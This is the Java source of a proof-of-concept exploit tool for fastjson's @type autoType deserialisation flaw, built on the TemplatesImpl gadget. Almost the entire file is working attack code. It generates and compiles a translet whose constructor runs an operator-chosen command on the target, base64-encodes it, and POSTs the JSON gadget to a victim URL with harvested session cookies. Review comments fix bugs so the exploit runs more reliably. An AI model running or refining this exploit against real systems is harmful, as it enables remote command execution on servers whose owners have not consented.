import java.io.*;
import java.lang.reflect.Array;
import java.net.ConnectException;
import java.net.SocketTimeoutException;
import java.net.URL;
import java.net.URLConnection;
import java.net.UnknownHostException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Arrays;
import java.util.Base64;
import java.util.List;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.tools.JavaCompiler;
import javax.tools.JavaFileObject;
import javax.tools.StandardJavaFileManager;
import javax.tools.ToolProvider;
import sun.misc.BASE64Encoder; // NOTE(review): removed in JDK 9+; unused once java.util.Base64 is used below - safe to drop
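/**
 * Proof-of-concept client for the fastjson {@code @type} autoType gadget built on
 * {@code com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl} (see the
 * JSON template in {@link #buildJsonPayload}).
 *
 * <p>Flow: {@link #paylaodFile} writes a translet source whose constructor runs
 * {@code cmd}, {@link #compilerPayload} compiles it with the in-process javac,
 * {@link #base64Encode} base64-encodes the resulting class file and
 * {@link #payloadTest} POSTs it as JSON to the target URL, reusing the target's
 * Set-Cookie session when asked to.
 *
 * <p>Offensive tooling: use only against systems you are authorised to test.
 * NOTE(review): the {@code _bytecodes}/{@code _outputProperties} gadget relies on
 * the target deserialising non-public fields of {@code TemplatesImpl}; whether the
 * target's fastjson version and parser features permit that is not visible here -
 * confirm before treating a negative result as "not vulnerable".
 */
public class fastjsonRce2017 {

    /** Generated translet source, written to the working directory. */
    private static final String PAYLOAD_SOURCE = "payload.java";
    /** Class file produced from {@link #PAYLOAD_SOURCE}. */
    private static final String PAYLOAD_CLASS = "payload.class";
    private static final String USER_AGENT =
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36";

    /**
     * Sends the TemplatesImpl payload to {@code url} as a JSON POST and prints the
     * response body.
     *
     * @param url     endpoint that hands the request body to fastjson
     * @param cookies Cookie header value to send; the literal string {@code "null"}
     *                means "fetch a session first": a plain GET to {@code url} is made
     *                and the {@code name=value;} part of every Set-Cookie header is reused
     * @param payload base64-encoded translet class file (see {@link #base64Encode})
     */
    public static void payloadTest(String url, String cookies, String payload) {
        String cookieHeader = cookies;
        if ("null".equals(cookies)) {
            cookieHeader = fetchCookies(url);
        }
        String body = buildJsonPayload(payload);
        try {
            URLConnection conn = new URL(url).openConnection();
            conn.setRequestProperty("User-Agent", USER_AGENT);
            conn.setRequestProperty("Content-Type", "application/json");
            if (!cookieHeader.isEmpty()) {
                // The original sent "Cookie: null" when no session cookie was obtained.
                conn.setRequestProperty("Cookie", cookieHeader);
            }
            // Both flags are required for URLConnection to perform a POST with a body.
            conn.setDoOutput(true);
            conn.setDoInput(true);
            try (Writer out = new OutputStreamWriter(conn.getOutputStream(), StandardCharsets.UTF_8)) {
                out.write(body);
            }
            StringBuilder response = new StringBuilder();
            try (BufferedReader in = new BufferedReader(
                    new InputStreamReader(conn.getInputStream(), StandardCharsets.UTF_8))) {
                String line;
                while ((line = in.readLine()) != null) {
                    response.append(line);
                }
            }
            System.out.println(response);
        } catch (ConnectException | UnknownHostException | SocketTimeoutException e) {
            // The original reported every exception as a successful test; a target
            // that cannot be reached at all is not evidence of anything.
            System.out.println("[-] Target unreachable: " + e);
        } catch (Exception e) {
            // Heuristic inherited from the original: an error response (typically the
            // server failing inside TemplatesImpl after the translet constructor has
            // already run the command) is reported as success. Any other server-side
            // error produces the same signal, so confirm out-of-band, e.g. via a
            // DNS/HTTP callback triggered by the command.
            System.out.println("[+] 测试成功");
            System.out.println(e);
        }
    }

    /**
     * GETs {@code url} and returns the space-separated {@code name=value;} parts of
     * its Set-Cookie headers, for reuse as a Cookie header.
     *
     * <p>Fixes two defects of the original inline loop: the accumulator started as the
     * literal {@code "null"} (so the header began with {@code nullJSESSIONID=...}),
     * and a Set-Cookie value without {@code ';'} was dropped because
     * {@code indexOf} returned -1 and the substring was empty.
     *
     * @return the joined cookie string, or {@code ""} when none could be obtained
     */
    static String fetchCookies(String url) {
        try {
            URLConnection probe = new URL(url).openConnection();
            Map<String, List<String>> headers = probe.getHeaderFields();
            StringBuilder joined = new StringBuilder();
            for (Map.Entry<String, List<String>> header : headers.entrySet()) {
                // The status line is keyed by null; header-name case is not guaranteed.
                if (header.getKey() != null && "Set-Cookie".equalsIgnoreCase(header.getKey())) {
                    joined.append(joinCookies(header.getValue()));
                }
            }
            return joined.toString();
        } catch (Exception e) {
            e.printStackTrace();
            System.out.println("Cookies Error : " + e);
            return "";
        }
    }

    /**
     * Keeps the {@code name=value;} prefix of each Set-Cookie value (attributes such
     * as Path/HttpOnly dropped), prints it as the original loop did, and joins the
     * prefixes with a trailing space each.
     *
     * @param setCookieHeaders raw Set-Cookie header values; may be empty
     * @return e.g. {@code "JSESSIONID=abc; "}, or {@code ""} for an empty list
     */
    static String joinCookies(List<String> setCookieHeaders) {
        StringBuilder joined = new StringBuilder();
        for (String header : setCookieHeaders) {
            int end = header.indexOf(';');
            String pair = end >= 0 ? header.substring(0, end + 1) : header + ";";
            System.out.println(pair);
            joined.append(pair).append(' ');
        }
        return joined.toString();
    }

    /**
     * Wraps the base64 class bytes in the TemplatesImpl gadget object. The JSON
     * template is byte-identical to the original (including the unquoted
     * {@code age} key, which fastjson's lenient parser accepts).
     *
     * @param payloadBase64 base64 of the translet class file, without line breaks
     */
    static String buildJsonPayload(String payloadBase64) {
        return "{\"name\":{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\""
                + payloadBase64
                + "\"],\"_name\":\"a.b\",\"_tfactory\":{ },\"_outputProperties\":{ },\"_version\":\"1.0\",\"allowedProtocols\":\"all\"},age:12}";
    }

    /**
     * Writes {@code payload.java}: an {@code AbstractTranslet} subclass whose
     * constructor runs {@code cmd} via {@code Runtime.exec(String)} on the target.
     *
     * <p>{@code cmd} is escaped as a Java string literal; the original concatenated it
     * raw, so any {@code "} or {@code \} in the command broke the generated source.
     * Note that {@code Runtime.exec(String)} on the target splits the command on
     * whitespace, so shell syntax (pipes, redirects) will not work as typed.
     *
     * @param cmd operating-system command to run on the target
     */
    public static void paylaodFile(String cmd) {
        String source = ""
                + "import com.sun.org.apache.xalan.internal.xsltc.DOM;\n"
                + "import com.sun.org.apache.xalan.internal.xsltc.TransletException;\n"
                + "import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;\n"
                + "import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;\n"
                + "import com.sun.org.apache.xml.internal.serializer.SerializationHandler;\n"
                + "import java.io.IOException;\n"
                + "public class payload extends AbstractTranslet {\n"
                + " public payload() throws IOException {\n"
                + " Runtime.getRuntime().exec(\"" + escapeJavaLiteral(cmd) + "\");\n"
                + " }\n"
                + " @Override\n"
                + " public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {\n"
                + " }\n"
                + " @Override\n"
                + " public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] haFndlers) throws TransletException {\n"
                + " }\n"
                + " public static void main(String[] args) throws Exception {\n"
                + " payload t = new payload();\n"
                + " }\n"
                + "}";
        // FileWriter uses the platform charset, which is also what javac assumes
        // by default below, so non-ASCII command text round-trips consistently.
        try (BufferedWriter out = new BufferedWriter(new FileWriter(PAYLOAD_SOURCE))) {
            out.write(source);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    /**
     * Escapes {@code s} for embedding inside a Java double-quoted string literal
     * (backslash, quote and the common control characters).
     *
     * @param s raw text; must not be null
     * @return text safe to place between {@code "} in generated Java source
     */
    static String escapeJavaLiteral(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 8);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '\\':
                    sb.append("\\\\");
                    break;
                case '"':
                    sb.append("\\\"");
                    break;
                case '\n':
                    sb.append("\\n");
                    break;
                case '\r':
                    sb.append("\\r");
                    break;
                case '\t':
                    sb.append("\\t");
                    break;
                default:
                    sb.append(c);
            }
        }
        return sb.toString();
    }

    /**
     * Compiles {@code payload.java} to {@code payload.class} with the in-process
     * system compiler.
     *
     * <p>The original ignored the compile result and dereferenced a null compiler on
     * a bare JRE; both now fail loudly instead of sending an empty payload.
     * NOTE(review): the generated source imports {@code com.sun.org.apache.xalan.internal}
     * classes, which JDK 9+ encapsulates, and the class-file version must be loadable
     * by the target JVM - build with a JDK matching the target (TODO confirm).
     *
     * @throws IllegalStateException when no compiler is available or compilation fails
     */
    public static void compilerPayload() {
        System.out.println("[+] Compilering ... ...");
        JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();
        if (compiler == null) {
            throw new IllegalStateException("No system Java compiler available - run with a JDK, not a JRE");
        }
        StandardJavaFileManager fileManager = compiler.getStandardFileManager(null, null, null);
        boolean ok;
        try {
            Iterable<? extends JavaFileObject> units = fileManager.getJavaFileObjects(new File(PAYLOAD_SOURCE));
            JavaCompiler.CompilationTask task = compiler.getTask(null, fileManager, null, null, null, units);
            ok = Boolean.TRUE.equals(task.call());
        } finally {
            try {
                fileManager.close();
            } catch (IOException ignored) {
                // nothing useful to do if the file manager fails to close
            }
        }
        if (!ok) {
            throw new IllegalStateException("Compilation of " + PAYLOAD_SOURCE + " failed; see diagnostics above");
        }
        System.out.println("[+] Compiler finish ... ...");
    }

    /**
     * Reads {@code payload.class} and returns it base64-encoded without line breaks.
     *
     * <p>Uses {@code java.util.Base64}'s basic encoder, which emits no line
     * separators, so the regex strip the original needed for the MIME-wrapped output
     * of {@code sun.misc.BASE64Encoder} (removed in JDK 9) is unnecessary.
     *
     * @return base64 of the class bytes; base64 of an empty array if the file
     *         could not be read (best-effort, as in the original)
     */
    public static String base64Encode() {
        byte[] classBytes;
        try {
            classBytes = Files.readAllBytes(Paths.get(PAYLOAD_CLASS));
        } catch (IOException e) {
            System.out.println("[+] Read payload.class Error\n" + e);
            e.printStackTrace();
            classBytes = new byte[0];
        }
        return Base64.getEncoder().encodeToString(classBytes);
    }

    /**
     * Entry point: {@code <url> <cookies|null> <cmd>}. Generates, compiles, encodes
     * and sends the payload, then removes the generated files even when a step fails.
     */
    public static void main(String[] args) {
        System.out.println(""
                + "【+】无Cookie情况下:\n"
                + "e.g : fastjson-2018-Rce.jar http://attackServer/test/test/ null \"ping www.baidu.com\" \n"
                + "【+】有Cookie情况下:\n"
                + "e.g : fastjson-2018-Rce.jar http://attackServer/test/test/ cookies \"ping www.baidu.com\"");
        if (args.length < 3) {
            // The original indexed args[2] unconditionally and crashed with AIOOBE.
            System.out.println("[-] Expected 3 arguments: <url> <cookies|null> <cmd>");
            return;
        }
        String url = args[0];
        String cookies = args[1];
        String cmd = args[2];
        try {
            paylaodFile(cmd);
            compilerPayload();
            String payload = base64Encode();
            payloadTest(url, cookies, payload);
        } finally {
            // Clean up the generated source and class file regardless of outcome.
            new File(PAYLOAD_SOURCE).delete();
            new File(PAYLOAD_CLASS).delete();
        }
    }
}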